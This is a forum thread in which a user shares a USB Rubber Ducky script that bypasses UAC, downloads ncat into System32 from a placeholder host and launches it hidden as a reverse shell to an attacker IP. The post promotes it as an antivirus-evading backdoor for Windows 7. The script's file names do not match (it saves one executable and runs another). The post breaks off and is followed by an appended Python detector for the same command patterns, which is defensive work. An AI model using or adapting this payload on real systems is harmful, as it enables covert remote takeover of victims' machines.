Grimsoul

Members
  • Posts

    3
  • Joined

  • Last visited

  1. It's also worth mentioning that the payload (key presses) won't start until the driver is installed. So you don't need a delay while you wait for the driver to install. You seem to misunderstand what the ducky is. It's a keyboard. That's it. It has no way of checking conditions. No logic (if and or). No feedback. You need to be crafty, which is its charm.
  2. This also works on x64 machines, unlike the base64 payload that uses a VB script.
  3. Just picked up my rubber ducky and thought I'd contribute a bit. (First post btw, Hi!) So we all know that netcat gets picked up by most anti-virus (a ratio of about 23/53), which makes using it as a backdoor slightly challenging. After doing some reading, I figured out that ncat (by nmap), a modernized version of netcat, only had a ratio of 4/53 and was undetected by a lot of major anti-virus programs. So here is a (relatively) undetected backdoor to any Windows 7 machine, coded from scratch by yours truly. By no means complicated or innovative at all. For this attack, we download a copy of ncat on the victim's machine and run it silently. You can pick up a portable exe of ncat straight from the developers' website (1.5 MB) here. ncat, unlike netcat, doesn't run in the background (it requires a cmd to be open to keep the connection alive), so I used some crafty PowerShell arguments to force it into the background. The rest is explained in the comments. You can compare the AV results between netcat and ncat here: VirusTotal ncat results (picked up by Norton though, sucks I know), VirusTotal netcat results. Please feel free to adapt this for your own tailored needs, be it persistence, no-download (twin-duck) or hidden cmd window. - GrimsouL

     REM --Windows shell undetected by AV (Ncat Download required) WIN7/UAC-- by: GrimSouL 11/7/2014
     REM //This delay required on my PC before attempting to get start menu, may not be required on yours/target.
     DELAY 1000
     CONTROL ESCAPE
     DELAY 400
     STRING cmd
     DELAY 400
     MENU
     REM //This delay is long because on my machine right clicking certain things takes a long time (many menu options), adjust as needed.
     DELAY 1000
     STRING a
     DELAY 200
     REM //This enter required for my PC, I've seen a lot of scripts where this is omitted but the 'a' above only selects the 'Run as admin' on my machine, hence we need an enter to actually 'click' it
     ENTER
     REM //This delay may need to be adjusted depending on machine. Sometimes takes long due to background dimming
     DELAY 700
     LEFTARROW
     DELAY 400
     ENTER
     DELAY 700
     REM //Simple powershell to download ncat portable. You can see it's a .txt extension because most hosters don't allow .exe files. So we change the extension of ncat to a .txt and upload it, then rename it back to an exe after download
     STRING powershell (new-object System.Net.WebClient).DownloadFile('http://yourhost.com/yourPayload.txt','%WINDIR%\System32\yourPayload.exe')
     ENTER
     REM //This delay is set to 10 seconds to wait for the downloaded file. Adjust as needed for your/target's connection speed. (ncat = 1.58MB)
     DELAY 10000
     ENTER
     REM //Where the magic happens, we run the downloaded ncat exe; since ncat doesn't run in the background, we use a powershell argument to make it so.
     STRING powershell Start-Process -WindowStyle hidden -FilePath %WINDIR%\System32\payloadEn.exe -ArgumentList '<attackerIP> <attackerPORT> -e cmd.exe'
     ENTER
     REM // We exit our powershell, however ncat runs silently leaving us with a clean getaway
     STRING exit
     ENTER

     To run our listener on the attacker machine
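From the defender's side, the post above is useful mainly as a description of what this kind of payload looks like in PowerShell command-line telemetry: a WebClient.DownloadFile into System32, followed by Start-Process with a hidden window and a "-e cmd.exe" argument. The following is an added example (not from the post or from the ducky project) of a small triage script that scans collected command lines for those markers and correlates a download destination with a later hidden launch of the same path. The sample command lines, host names and paths are constructed for the example.

```python
import re

# Constructed sample of PowerShell command lines, as a defender might pull them
# from script-block or process-creation logging. These are made-up records.
SAMPLE_COMMAND_LINES = [
    "powershell (new-object System.Net.WebClient).DownloadFile("
    "'http://example.invalid/tool.txt','%WINDIR%\\System32\\tool.exe')",
    "powershell Start-Process -WindowStyle hidden "
    "-FilePath C:\\Windows\\System32\\tool.exe "
    "-ArgumentList '203.0.113.5 4444 -e cmd.exe'",
    "powershell Get-ChildItem C:\\Users\\alice\\Documents",
    "powershell Start-Process notepad.exe",
]

# Individual indicators. Each on its own is noisy in some environments; the
# combination (and the download-then-exec correlation below) is what matters.
RULES = {
    "webclient_download": re.compile(r"WebClient\)?\s*\.\s*DownloadFile", re.I),
    "hidden_window": re.compile(r"Start-Process\b.*-WindowStyle\s+hidden", re.I),
    "exec_from_system32": re.compile(
        r"(?:%WINDIR%|C:\\Windows)\\System32\\[^\s'\"]+\.exe", re.I),
    "shell_redirect_arg": re.compile(r"-e\s+cmd(?:\.exe)?\b", re.I),
}

# Capture the destination of DownloadFile(url, dest) and the -FilePath of
# Start-Process so the two events can be tied together by path.
DOWNLOAD_DEST = re.compile(r"DownloadFile\(\s*'[^']*'\s*,\s*'([^']+)'\s*\)", re.I)
START_PROCESS_PATH = re.compile(r"-FilePath\s+['\"]?([^\s'\"]+)", re.I)


def normalize_path(path: str) -> str:
    """Expand %WINDIR% (assumed to be C:\\Windows) and lowercase for comparison."""
    return path.replace("%WINDIR%", "C:\\Windows").lower()


def match_rules(cmd: str) -> list:
    """Return the names of all indicator rules that fire on one command line."""
    return [name for name, rx in RULES.items() if rx.search(cmd)]


def correlate(lines: list) -> list:
    """Scan command lines in order; return (index, rules) for every flagged line.

    A Start-Process with a hidden window whose -FilePath matches an earlier
    DownloadFile destination gets the extra tag 'download_then_hidden_exec'.
    """
    downloaded = {}   # normalized destination path -> index of the download line
    findings = []
    for idx, cmd in enumerate(lines):
        rules = match_rules(cmd)
        m = DOWNLOAD_DEST.search(cmd)
        if m:
            downloaded[normalize_path(m.group(1))] = idx
        m = START_PROCESS_PATH.search(cmd)
        if m and "hidden_window" in rules and normalize_path(m.group(1)) in downloaded:
            rules.append("download_then_hidden_exec")
        if rules:
            findings.append((idx, rules))
    return findings


if __name__ == "__main__":
    for idx, rules in correlate(SAMPLE_COMMAND_LINES):
        print(f"line {idx}: {', '.join(rules)}")
        print(f"    {SAMPLE_COMMAND_LINES[idx]}")
```

The path normalization is what lets the correlation survive the post's trick of writing the download destination with %WINDIR% and the execution path literally; in a real deployment the same idea would be applied to whatever environment variables the logging source leaves unexpanded.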